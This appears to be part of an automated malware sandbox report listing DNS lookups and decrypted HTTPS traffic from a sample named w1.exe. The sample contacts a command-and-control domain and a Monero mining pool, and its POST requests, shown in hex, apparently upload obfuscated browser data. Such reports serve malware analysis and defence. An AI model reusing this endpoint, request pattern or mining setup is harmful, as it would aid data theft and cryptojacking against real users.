                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Aug 25, 2024 15:43:55.409955025 CEST1.1.1.1192.168.2.40x3997No error (0)animoanimalestop.fun172.67.195.146A (IP address)IN (0x0001)false
                                            Aug 25, 2024 15:43:55.409955025 CEST1.1.1.1192.168.2.40x3997No error (0)animoanimalestop.fun104.21.52.51A (IP address)IN (0x0001)false
                                            Aug 25, 2024 15:45:00.565752029 CEST1.1.1.1192.168.2.40xa567No error (0)xmr-eu1.nanopool.org51.15.58.224A (IP address)IN (0x0001)false
                                            Aug 25, 2024 15:45:00.565752029 CEST1.1.1.1192.168.2.40xa567No error (0)xmr-eu1.nanopool.org54.37.137.114A (IP address)IN (0x0001)false
                                            Aug 25, 2024 15:45:00.565752029 CEST1.1.1.1192.168.2.40xa567No error (0)xmr-eu1.nanopool.org146.59.154.106A (IP address)IN (0x0001)false
                                            Aug 25, 2024 15:45:00.565752029 CEST1.1.1.1192.168.2.40xa567No error (0)xmr-eu1.nanopool.org54.37.232.103A (IP address)IN (0x0001)false
                                            Aug 25, 2024 15:45:00.565752029 CEST1.1.1.1192.168.2.40xa567No error (0)xmr-eu1.nanopool.org162.19.224.121A (IP address)IN (0x0001)false
                                            Aug 25, 2024 15:45:00.565752029 CEST1.1.1.1192.168.2.40xa567No error (0)xmr-eu1.nanopool.org141.94.23.83A (IP address)IN (0x0001)false
                                            Aug 25, 2024 15:45:00.565752029 CEST1.1.1.1192.168.2.40xa567No error (0)xmr-eu1.nanopool.org212.47.253.124A (IP address)IN (0x0001)false
                                            Aug 25, 2024 15:45:00.565752029 CEST1.1.1.1192.168.2.40xa567No error (0)xmr-eu1.nanopool.org51.15.193.130A (IP address)IN (0x0001)false
                                            Aug 25, 2024 15:45:00.565752029 CEST1.1.1.1192.168.2.40xa567No error (0)xmr-eu1.nanopool.org51.15.65.182A (IP address)IN (0x0001)false
                                            Aug 25, 2024 15:45:00.565752029 CEST1.1.1.1192.168.2.40xa567No error (0)xmr-eu1.nanopool.org51.89.23.91A (IP address)IN (0x0001)false
                                            Aug 25, 2024 15:45:00.565752029 CEST1.1.1.1192.168.2.40xa567No error (0)xmr-eu1.nanopool.org163.172.154.142A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • animoanimalestop.fun

                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.449736172.67.195.1464435672C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe
                                            TimestampBytes transferredDirectionData
                                            2024-08-25 13:43:55 UTC339OUTPOST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                            Content-Length: 96
                                            Host: animoanimalestop.fun
                                            2024-08-25 13:43:55 UTC96OUTData Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 00 fe ff ff ff 2d 00 00 00 00 00 00 00 00 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                            Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
                                            2024-08-25 13:43:56 UTC664INHTTP/1.1 200 OK
                                            Date: Sun, 25 Aug 2024 13:43:56 GMT
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            v: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VcebaxIJjIXdtHeHATO9qSztLdeqTnmX3vMfA95x6Sx%2F2HESdPrVKAj2u6ySN7hqwze6iTZnXEBMlvAlOtPtB%2FNoehaDHsTvwtJZeMXxfKlnNKjH90810kXpe7%2FD2WZPnPAaTEp9UQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8b8c038f2ad8439a-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-08-25 13:43:56 UTC705INData Raw: 33 37 61 61 0d 0a 8f ce f5 25 cc 55 00 00 00 00 00 00 00 00 00 00 0b 00 14 00 96 01 2f 03 08 b8 02 00 1c 0f 18 aa 2f 03 59 b8 28 54 22 63 af ba 79 9a 68 78 65 7d 79 6f 78 24 6f 72 6f 1d 00 14 00 ee 06 e6 03 08 b8 02 00 1c 0f 18 aa e6 03 f2 b8 28 54 22 63 af ba 79 9a 67 6f 79 79 6f 64 6d 6f 78 79 56 4e 63 79 69 65 78 6e 56 59 7e 6b 68 66 6f 56 61 6f 73 08 00 14 00 36 0b bb 07 08 d8 02 00 1c 0f 18 aa bb 07 26 d8 b5 bf e2 b4 a1 55 2c 26 39 42 dd 41 52 25 e1 bf 08 00 14 00 45 06 ad 09 08 d8 02 00 1c 0f 18 aa ad 09 77 d8 73 a8 82 dd c0 ca 17 f2 fd 55 bd 28 33 ba da 6b 0a 00 14 00 cf 0a dc 00 08 b8 02 00 1c 0f 18 aa dc 00 4e b8 28 54 22 63 af ba 79 9a 6f 72 7e 6f 64 79 63 65 64 79 19 00 14 00 9a 06 c6 02 08 b8 02 00 1c 0f 18 aa c6 02 f2 b8 28 54 22 63 af ba 79
                                            Data Ascii: 37aa%U//Y(T"cyhxe}yox$oro(T"cygoyyodmoxyVNcyiexnVY~khfoVaos6&U,&9BAR%EwsU(3kN(T"cyor~odycedy(T"cy
                                            2024-08-25 13:43:56 UTC1369INData Raw: 02 00 1c 0f 18 aa 10 07 9a dd fc 53 8b 76 39 fb e3 ac 05 00 14 00 2f 0b 16 00 08 b8 02 00 1c 0f 18 aa 16 00 26 b8 28 54 22 63 af ba 79 9a 20 24 7c 64 69 04 00 10 00 a5 0b f3 06 04 dd 02 00 1c 0f 18 aa f3 06 9a dd b0 f7 4f bf 75 5b 27 65 06 00 14 00 aa 04 69 04 08 b8 02 00 1c 0f 18 aa 69 04 9a b8 28 54 22 63 af ba 79 9a 20 24 79 6f 69 20 08 00 14 00 fd 01 7b 06 08 b8 02 00 1c 0f 18 aa 7b 06 77 b8 28 54 22 63 af ba 79 9a 7a 78 65 6c 63 66 6f 79 11 00 14 00 64 02 e7 04 08 b8 02 00 1c 0f 18 aa e7 04 26 b8 28 54 22 63 af ba 79 9a 49 65 64 64 6f 69 7e 63 65 64 4b 6e 6e 78 6f 79 79 05 00 14 00 90 07 cc 07 08 b8 02 00 1c 0f 18 aa cc 07 26 b8 28 54 22 63 af ba 79 9a 20 24 7c 64 69 08 00 14 00 e1 08 4f 08 08 d8 02 00 1c 0f 18 aa 4f 08 59 d8 e0 bd 92 80 08 28 dc fd
                                            Data Ascii: Sv9/&(T"cy $|diOu['eii(T"cy $yoi {{w(T"cyzxelcfoyd&(T"cyIeddoi~cedKnnxoyy&(T"cy $|diOOY(
                                            2024-08-25 13:43:56 UTC1369INData Raw: 06 4a 0b 04 dd 02 00 1c 0f 18 aa 4a 0b 9a dd 18 11 f9 b5 dd b9 91 6f 08 00 14 00 96 00 6f 05 08 b8 02 00 1c 0f 18 aa 6f 05 9a b8 28 54 22 63 af ba 79 9a 7e 72 62 63 64 7e 79 20 08 00 14 00 b3 05 7e 02 08 d8 02 00 1c 0f 18 aa 7e 02 59 d8 cd 29 52 2a ad 21 e4 c7 41 d4 6d df 5e 51 29 5e 0d 00 14 00 9e 03 f6 03 08 b8 02 00 1c 0f 18 aa f6 03 77 b8 28 54 22 63 af ba 79 9a 7a 66 6b 69 6f 79 24 79 7b 66 63 7e 6f 04 00 10 00 6d 0a 77 06 04 dd 02 00 1c 0f 18 aa 77 06 9a dd 99 fa d1 f4 5c b3 4c 2b 08 00 14 00 ad 04 30 05 08 d8 02 00 1c 0f 18 aa 30 05 26 d8 31 6a a0 1a 01 2c bd 58 bd 97 9f ef f2 5c 70 c1 1d 00 14 00 18 05 e5 02 08 b8 02 00 1c 0f 18 aa e5 02 f2 b8 28 54 22 63 af ba 79 9a 6e 63 79 69 65 78 6e 56 46 65 69 6b 66 2a 59 7e 65 78 6b 6d 6f 56 66 6f 7c 6f 66
                                            Data Ascii: JJooo(T"cy~rbcd~y ~~Y)R*!Am^Q)^w(T"cyzfkioy$y{fc~omww\L+00&1j,X\p(T"cyncyiexnVFeikf*Y~exkmoVfo|of
                                            2024-08-25 13:43:56 UTC1369INData Raw: 6f 78 79 08 00 14 00 32 05 f5 03 08 d8 02 00 1c 0f 18 aa f5 03 59 d8 c1 16 f6 fa aa 79 df d2 48 eb c9 0f 59 09 12 4b 04 00 10 00 d0 08 a6 07 04 dd 02 00 1c 0f 18 aa a6 07 4e dd 02 f8 94 f6 c7 b1 09 29 08 00 14 00 74 06 c0 01 08 b8 02 00 1c 0f 18 aa c0 01 9a b8 28 54 22 63 af ba 79 9a 4f 66 6f 69 7e 78 7f 67 16 00 14 00 44 07 fd 00 08 b8 02 00 1c 0f 18 aa fd 00 26 b8 28 54 22 63 af ba 79 9a 7c 64 69 56 5e 63 6d 62 7e 5c 44 49 56 6e 6b 7e 6b 24 60 79 65 64 1b 00 14 00 ad 03 a3 09 08 b8 02 00 1c 0f 18 aa a3 09 26 b8 28 54 22 63 af ba 79 9a 7c 64 69 56 5f 66 7e 78 6b 5c 44 49 56 69 66 63 6f 64 7e 56 69 65 64 6c 63 6d 79 08 00 14 00 0c 02 24 01 08 b8 02 00 1c 0f 18 aa 24 01 9a b8 28 54 22 63 af ba 79 9a 20 24 69 65 64 6c 63 6d 04 00 10 00 30 04 84 09 04 dd 02
                                            Data Ascii: oxy2YyHYKN)t(T"cyOfoi~xgD&(T"cy|diV^cmb~\DIVnk~k$`yed&(T"cy|diV_f~xk\DIVifcod~Viedlcmy$$(T"cy $iedlcm0
                                            2024-08-25 13:43:56 UTC1369INData Raw: 82 83 99 57 ee 55 2b bb bd 76 6a 27 23 cc 04 00 10 00 4f 0a 05 08 04 dd 02 00 1c 0f 18 aa 05 08 9a dd 9b bb 53 bb 5f 13 3b 61 04 00 10 00 6f 0a dc 07 04 dd 02 00 1c 0f 18 aa dc 07 26 dd 28 3d 5c 82 ec 95 34 58 04 00 10 00 75 04 31 0b 04 dd 02 00 1c 0f 18 aa 31 0b 9a dd 1e 69 e5 b5 da c1 8d 6f 11 00 14 00 7c 05 7e 03 08 b8 02 00 1c 0f 18 aa 7e 03 59 b8 28 54 22 63 af ba 79 9a 28 6f 64 69 78 73 7a 7e 6f 6e 55 61 6f 73 28 30 28 01 00 14 00 3f 09 bc 06 08 b8 02 00 1c 0f 18 aa bc 06 f2 b8 28 54 22 63 af ba 79 9a 20 27 00 14 00 83 09 cf 03 08 b8 02 00 1c 0f 18 aa cf 03 26 b8 28 54 22 63 af ba 79 9a 58 6f 6b 66 5c 44 49 56 7c 64 69 7c 63 6f 7d 6f 78 24 6e 56 7a 6b 79 79 7d 65 78 6e 79 24 6f 64 69 67 6b 79 7e 6f 78 07 00 14 00 54 02 92 02 08 b8 02 00 1c 0f 18 aa
                                            Data Ascii: WU+vj'#OS_;ao&(=\4Xu11io|~~Y(T"cy(odixsz~onUaos(0(?(T"cy '&(T"cyXokf\DIV|di|co}ox$nVzkyy}exny$odigky~oxT
                                            2024-08-25 13:43:56 UTC1369INData Raw: 02 5b 05 08 b8 02 00 1c 0f 18 aa 5b 05 4e b8 28 54 22 63 af ba 79 9a 4e 6f 6c 6b 7f 66 7e 22 00 14 00 81 08 61 09 08 b8 02 00 1c 0f 18 aa 61 09 26 b8 28 54 22 63 af ba 79 9a 58 6f 6b 66 5c 44 49 56 7c 64 69 7c 63 6f 7d 6f 78 24 6e 56 7a 6b 79 79 7d 65 78 6e 79 24 60 79 65 64 04 00 10 00 24 0a 0d 07 04 dd 02 00 1c 0f 18 aa 0d 07 9a dd e7 10 fe 21 22 b8 96 fb 06 00 14 00 84 01 86 01 08 b8 02 00 1c 0f 18 aa 86 01 26 b8 28 54 22 63 af ba 79 9a 59 6f 78 7c 6f 78 07 00 14 00 02 00 77 05 08 b8 02 00 1c 0f 18 aa 77 05 26 b8 28 54 22 63 af ba 79 9a 7a 78 63 7c 6b 7e 6f 08 00 14 00 6a 0a 32 04 08 d8 02 00 1c 0f 18 aa 32 04 74 d8 e0 40 5e 1e a9 fa 00 36 6d bd 61 eb 5a 8a cd af 04 00 10 00 80 02 c6 08 04 dd 02 00 1c 0f 18 aa c6 08 9a dd 55 3d 68 26 90 95 00 fc 08 00
                                            Data Ascii: [[N(T"cyNolkf~"aa&(T"cyXokf\DIV|di|co}ox$nVzkyy}exny$`yed$!"&(T"cyYox|oxww&(T"cyzxc|k~oj22t@^6maZU=h&
                                            2024-08-25 13:43:56 UTC1369INData Raw: 04 00 10 00 54 05 93 03 04 dd 02 00 1c 0f 18 aa 93 03 59 dd 28 80 34 91 df ba 19 51 04 00 10 00 b4 06 5d 03 04 dd 02 00 1c 0f 18 aa 5d 03 9a dd 80 cc f8 c6 45 60 90 1c 04 00 10 00 70 05 c8 07 04 dd 02 00 1c 0f 18 aa c8 07 f2 dd 2b 01 73 93 ec a9 1b 49 21 00 14 00 33 05 8a 09 08 b8 02 00 1c 0f 18 aa 8a 09 f2 b8 28 54 22 63 af ba 79 9a 67 6f 79 79 6f 64 6d 6f 78 79 56 5e 6f 66 6f 6d 78 6b 67 56 4e 6f 79 61 7e 65 7a 56 7e 6e 6b 7e 6b 04 00 10 00 4d 05 8e 09 04 dd 02 00 1c 0f 18 aa 8e 09 4e dd 17 ac 8f 0a d2 e5 12 d5 04 00 10 00 64 05 44 0a 04 dd 02 00 1c 0f 18 aa 44 0a f2 dd 62 3d 5b 6a a7 91 33 b0 13 00 14 00 63 04 b5 09 08 b8 02 00 1c 0f 18 aa b5 09 f2 b8 28 54 22 63 af ba 79 9a 6e 63 79 69 65 78 6e 56 46 65 69 6b 66 2a 59 7e 6b 7e 6f 04 00 10 00 15 08 b2
                                            Data Ascii: TY(4Q]]E`p+sI!3(T"cygoyyodmoxyV^ofomxkgVNoya~ezV~nk~kMNdDDb=[j3c(T"cyncyiexnVFeikf*Y~k~o
                                            2024-08-25 13:43:56 UTC1369INData Raw: 56 78 6f 69 6f 64 7e 79 6f 78 7c 6f 78 79 24 72 67 66 0b 00 14 00 3b 05 49 08 08 b8 02 00 1c 0f 18 aa 49 08 6e b8 28 54 22 63 af ba 79 9a 6d 6b 67 6f 79 56 59 7e 6f 6b 67 07 00 14 00 99 06 b8 02 08 b8 02 00 1c 0f 18 aa b8 02 26 b8 28 54 22 63 af ba 79 9a 62 63 79 7e 65 78 73 1d 00 14 00 7f 08 86 0b 08 b8 02 00 1c 0f 18 aa 86 0b 74 b8 28 54 22 63 af ba 79 9a 6c 7e 7a 56 4c 63 66 6f 50 63 66 66 6b 56 79 63 7e 6f 67 6b 64 6b 6d 6f 78 24 72 67 66 04 00 10 00 2d 06 cd 08 04 dd 02 00 1c 0f 18 aa cd 08 9a dd 36 0f 9a e6 f3 a3 f2 3c 0b 00 14 00 da 02 0f 01 08 b8 02 00 1c 0f 18 aa 0f 01 9a b8 28 54 22 63 af ba 79 9a 40 6b 72 72 46 63 68 6f 78 7e 73 28 00 14 00 3c 00 ca 03 08 b8 02 00 1c 0f 18 aa ca 03 f2 b8 28 54 22 63 af ba 79 9a 6e 63 79 69 65 78 6e 6e 6f 7c 6f
                                            Data Ascii: Vxoiod~yox|oxy$rgf;IIn(T"cymkgoyVY~okg&(T"cybcy~exst(T"cyl~zVLcfoPcffkVyc~ogkdkmox$rgf-6<(T"cy@krrFchox~s(<(T"cyncyiexnno|o
                                            2024-08-25 13:43:56 UTC1369INData Raw: 49 04 00 10 00 fc 05 0e 07 04 dd 02 00 1c 0f 18 aa 0e 07 26 dd b3 44 db 0d 77 ec b3 d7 01 00 14 00 a9 03 47 02 08 b8 02 00 1c 0f 18 aa 47 02 9a b8 28 54 22 63 af ba 79 9a 20 04 00 10 00 e1 03 6e 02 04 dd 02 00 1c 0f 18 aa 6e 02 6e dd b3 23 eb cd 77 8b 83 17 04 00 10 00 56 0b 29 09 04 dd 02 00 1c 0f 18 aa 29 09 9a dd 37 c4 ea 70 f2 6c 82 aa 05 00 14 00 d0 00 21 01 08 b8 02 00 1c 0f 18 aa 21 01 f2 b8 28 54 22 63 af ba 79 9a 20 24 66 65 6d 07 00 14 00 56 06 b3 08 08 b8 02 00 1c 0f 18 aa b3 08 4e b8 28 54 22 63 af ba 79 9a 49 5f 58 58 4f 44 5e 08 00 14 00 01 0b 6b 0b 08 d8 02 00 1c 0f 18 aa 6b 0b f2 d8 06 75 50 4a f1 c8 7e 2b 8a 9c 6f bf 02 b8 b3 b2 08 00 14 00 ad 0b 4a 0a 08 b8 02 00 1c 0f 18 aa 4a 0a 77 b8 28 54 22 63 af ba 79 9a 5a 78 65 6c 63 66 6f 79 04
                                            Data Ascii: I&DwGG(T"cy nnn#wV))7pl!!(T"cy $femVN(T"cyI_XXOD^kkuPJ~+oJJw(T"cyZxelcfoy


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.449737172.67.195.1464435672C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe
                                            TimestampBytes transferredDirectionData
                                            2024-08-25 13:43:56 UTC463OUTPOST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                            view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
                                            Content-Length: 208
                                            Host: animoanimalestop.fun
                                            2024-08-25 13:43:56 UTC208OUTData Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 a6 5b 58 3e 95 00 00 00 08 00 00 00 56 00 00 00 28 63 2c db 2c ce 79 9a ac 51 52 34 09 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 98 ca 9a ac 51 52 34 68 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 5a 41 0c 0c 26 0a 0a 0a 0a 0a 0a 0a 27 0a 27 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 5a 41 0c 0d 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0b 0a 0a 0a 5a 41 0f 0c 0a 0a 0a 0a f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 0a 0a f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                            Data Ascii: [X>V(c,,yQR4QR4hZA&''ZAZA
                                            2024-08-25 13:43:57 UTC644INHTTP/1.1 204 No Content
                                            Date: Sun, 25 Aug 2024 13:43:57 GMT
                                            Connection: close
                                            v: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DPD5h7PQ240%2BmRbwWdC3ALA0irBiuinESIrNPfK3y921vY2PCT2ay8XH5YEcbzWSZI2QkQaHmh%2FrHuC5YhjgikkBMgkmSzq2ceekRbu9a1WdflCIw0L1bKW3dWyyl0G5%2FKMtwBtttQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8b8c03953e214211-EWR
                                            alt-svc: h3=":443"; ma=86400


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.449738172.67.195.1464435672C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe
                                            TimestampBytes transferredDirectionData
                                            2024-08-25 13:43:59 UTC466OUTPOST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                            view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
                                            Content-Length: 101666
                                            Host: animoanimalestop.fun
                                            2024-08-25 13:43:59 UTC15331OUTData Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 45 31 c0 10 97 36 01 00 08 00 00 00 56 00 00 00 28 63 2c db 2c ce 79 9a 4f 3b ca 1a b8 08 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 99 ca 9a 98 9e ac 49 62 78 65 67 6f d3 3e 49 30 56 5f 79 6f 78 79 56 60 65 64 6f 79 56 4b 7a 7a 4e 6b 7e 6b 56 46 65 69 6b 66 56 4d 65 65 6d 66 6f 56 49 62 78 65 67 6f 56 5f 79 6f 78 2a 4e 6b 7e 6b 9b 9d ad 4e 6f 6c 6b 7f 66 7e d3 36 49 30 56 5f 79 6f 78 79 56 60 65 64 6f 79 56 4b 7a 7a 4e 6b 7e 6b 56 46 65 69 6b 66 56 4d 65 65 6d 66 6f 56 49 62 78 65 67 6f 56 5f 79 6f 78 2a 4e 6b 7e 6b 56 4e 6f 6c 6b 7f 66 7e d3 3e 69 62 78 65 67 63 7f 67 55 68 78 65 7d 79 6f 78 79 56 49 62 78 65 67 6f 56 7a 78 65 6c 63 66 6f 79 56 4e 6f 6c 6b 7f 66 7e 56 46 65 6d 63 64 2a 4e 6b 7e 6b d3 3b 69 62
                                            Data Ascii: E16V(c,,yO;Ibxego>I0V_yoxyV`edoyVKzzNk~kVFeikfVMeemfoVIbxegoV_yox*Nk~kNolkf~6I0V_yoxyV`edoyVKzzNk~kVFeikfVMeemfoVIbxegoV_yox*Nk~kVNolkf~>ibxegcgUhxe}yoxyVIbxegoVzxelcfoyVNolkf~VFemcd*Nk~k;ib
                                            2024-08-25 13:43:59 UTC15331OUTData Raw: 53 cc bb 56 8e 5a d3 70 58 1c 4e 9c da 10 6b 62 c0 50 88 40 b6 ba 47 f8 a7 57 5c e1 1e d7 d4 30 3f 34 3a 47 5d 5d 3c c9 2f ce fc b8 b1 d9 be 0a 80 f5 1b dc 0d aa f8 e5 9d ae d3 86 14 12 34 81 7e 00 2b 5a d0 60 ee b8 93 c7 9b 8e b8 55 14 4c 36 9c 68 59 e3 00 71 36 68 b9 e1 10 62 a4 54 cc fe 89 70 40 18 79 36 da c9 03 01 77 49 85 27 04 44 f6 a7 97 03 55 57 5b ef 46 72 7f b4 49 c3 fa f9 03 42 d6 d7 35 52 74 f9 d0 a6 84 5c 97 6b ad 0d 5a 42 d4 8a 0f 8e 60 16 17 84 27 c9 5c 8f 46 11 73 9d fc 9f 4d 2b a0 fc eb 15 c7 cb d4 cb 89 62 67 a9 7c 6d dc ef 22 6f 51 0b 2b 05 74 fc e9 49 d6 55 89 ea 13 b1 fa 76 6f 9e 7f 5b ee 8e 0c 68 c5 69 62 b0 ea 7b 19 90 de 9c d7 11 ec b1 14 ab b1 9f 64 7d ea 52 fc 5e 37 94 94 0e 89 6e 0b 88 39 af 8d 87 40 00 7c 64 1d 4b d0 1b 3c 46
                                            Data Ascii: SVZpXNkbP@GW\0?4:G]]</4~+Z`UL6hYq6hbTp@y6wI'DUW[FrIB5Rt\kZB`'\FsM+bg|m"oQ+tIUvo[hib{d}R^7n9@|dK<F
                                            2024-08-25 13:43:59 UTC15331OUTData Raw: 5c 59 75 cc f4 60 34 34 cb bb 6c 71 c1 21 96 50 23 8a e7 60 0a 61 75 41 b7 2d 0c 34 1f b0 d9 9f bf ac 9f e5 70 ea 2c b2 a1 41 a2 d6 7f d9 7b 25 5e c9 60 c2 32 4b 44 48 33 e1 89 f8 8b 0d 23 c6 c5 21 26 41 af 4b 27 5d ad f9 42 ae 3d 18 48 0c 9e 44 d9 52 76 31 f0 3b 36 2d 2d e4 69 2b fb a8 37 68 19 b4 61 e2 73 84 35 8c 7d 39 0c d7 da e5 b3 fe 7f 45 da bc 72 ee 07 d8 c8 cd 3e e0 17 98 cc c1 8a 44 83 f3 ef ac 8d 44 e3 b3 5c b7 4a 3e 7d 8b b8 b7 42 36 7d 30 af 0b ed 4a 22 00 5d 37 d1 a7 e5 46 0f 7b 2a 4d 29 80 04 bc e6 c4 5f 1e bb ae 3f 7d 3a 91 a9 bf 36 a3 54 45 d3 66 1e 0b 93 7b 79 d4 ee 49 1d ed 9a 38 3c 2c 8b 76 7b 80 9b 6c a4 dd c7 08 37 08 8d 10 ce 9c c8 0b 92 fa 70 b9 aa 8a e8 a0 1c 32 22 6c f4 30 15 01 a3 08 bd d0 b0 49 83 45 9e 2a 94 86 1a 2f cc 4e 3a
                                            Data Ascii: \Yu`44lq!P#`auA-4p,A{%^`2KDH3#!&AK']B=HDRv1;6--i+7has5}9Er>DD\J>}B6}0J"]7F{*M)_?}:6TEf{yI8<,v{l7p2"l0IE*/N:
                                            2024-08-25 13:43:59 UTC15331OUTData Raw: c5 df a5 c8 1f d9 0b 7a 7a a0 6b 94 86 0b 84 05 e6 a9 70 3e a4 42 10 04 3a ae 80 fe 2c bb 58 a4 38 ce 3d 56 30 59 c0 aa fb 72 b2 2c 37 05 7b 98 de 84 1c 8e 9c f1 46 09 28 3c bf 48 15 05 69 f2 c0 db c9 2d 5d c7 c3 bf bd 48 de 91 32 76 fb 9d c8 f7 f5 e4 c2 87 0f 30 2f e2 87 73 28 db 91 c8 12 e4 79 7e ba d2 dd 78 b7 13 a6 eb 74 2d 05 c1 76 3f b5 9c f4 06 ab 3d dc 82 8e 15 80 77 b3 c5 22 2a 68 57 21 fe eb 3a 8c 1d 12 37 36 fc df 36 d1 70 41 8e d5 83 c9 7a 75 c3 f9 0f 30 27 e2 87 6f 28 db b1 c8 12 94 f9 7e ba b2 d8 78 77 10 a6 eb 71 2d 05 2d 77 3f 0d 9d f4 26 aa 3d bc 02 96 15 00 60 b3 c5 38 2a 68 6c 27 fe b0 ba 8c d1 10 36 46 7c 9c 56 95 09 41 8e be 83 c9 4e 75 c3 b3 0f d0 d3 c8 97 fc b2 24 7f 54 8d 72 4b 21 8e d9 36 60 13 29 96 13 2a 30 ad 5a 1a 53 a6 d5 14
                                            Data Ascii: zzkp>B:,X8=V0Yr,7{F(<Hi-]H2v0/s(y~xt-v?=w"*hW!:766pAzu0'o(~xwq--w?&=`8*hl'6F|VANu$TrK!6`)*0ZS
                                            2024-08-25 13:43:59 UTC15331OUTData Raw: bb 64 eb a9 fc 7c e5 49 7d 5b c5 e0 97 65 a7 56 76 b4 b9 ff 1b c1 7f 5b 9c 41 c4 e4 3b c1 2f 3d ee a6 44 dd 1d 61 6f 3d 27 5a fd 27 25 77 23 06 1e 22 1a 32 62 da dc 83 00 ae 0b 96 aa 43 97 08 83 09 de 4a eb cc e4 4d d0 2a 63 99 1c 43 1a 32 4b 11 5e 0f c2 f7 ea d4 78 7f 78 e8 ae e0 ec f5 71 da 24 6d 8c 39 c9 eb 9a 96 13 a4 e4 c8 99 11 2c 6d 78 cf 7b e1 10 9d 6d c3 0b 28 02 ee 5d 6f 93 1a 18 29 8e 96 2e 37 97 ba 04 2b fe 77 92 12 33 ff 9b a5 cf 03 2b 08 f7 65 48 02 b3 3d f2 0a 0a 0a 0a 0a 0a 0a 8a 55 96 29 0d d8 8e 1a 9b 74 8b da f5 ae f5 4e b5 1a 80 08 0a 0a 0a 0a 0a 0a 8a 31 c2 77 a8 72 ec aa af 73 56 df 97 70 49 e9 6c d3 68 e0 1f ec 70 ac 69 1d 1c 2c cd ce a9 0d d1 51 01 01 0d 0e fb 8b 89 ff b0 dc 5a 37 a4 fb ac ad 1e cc f7 f3 f5 9d 03 f7 38 f7 34 f7 6c
                                            Data Ascii: d|I}[eVv[A;/=Dao='Z'%w#"2bCJM*cC2K^xxq$m9,mx{m(]o).7+w3+eH=U)tN1wrsVpIlhpi,QZ784l
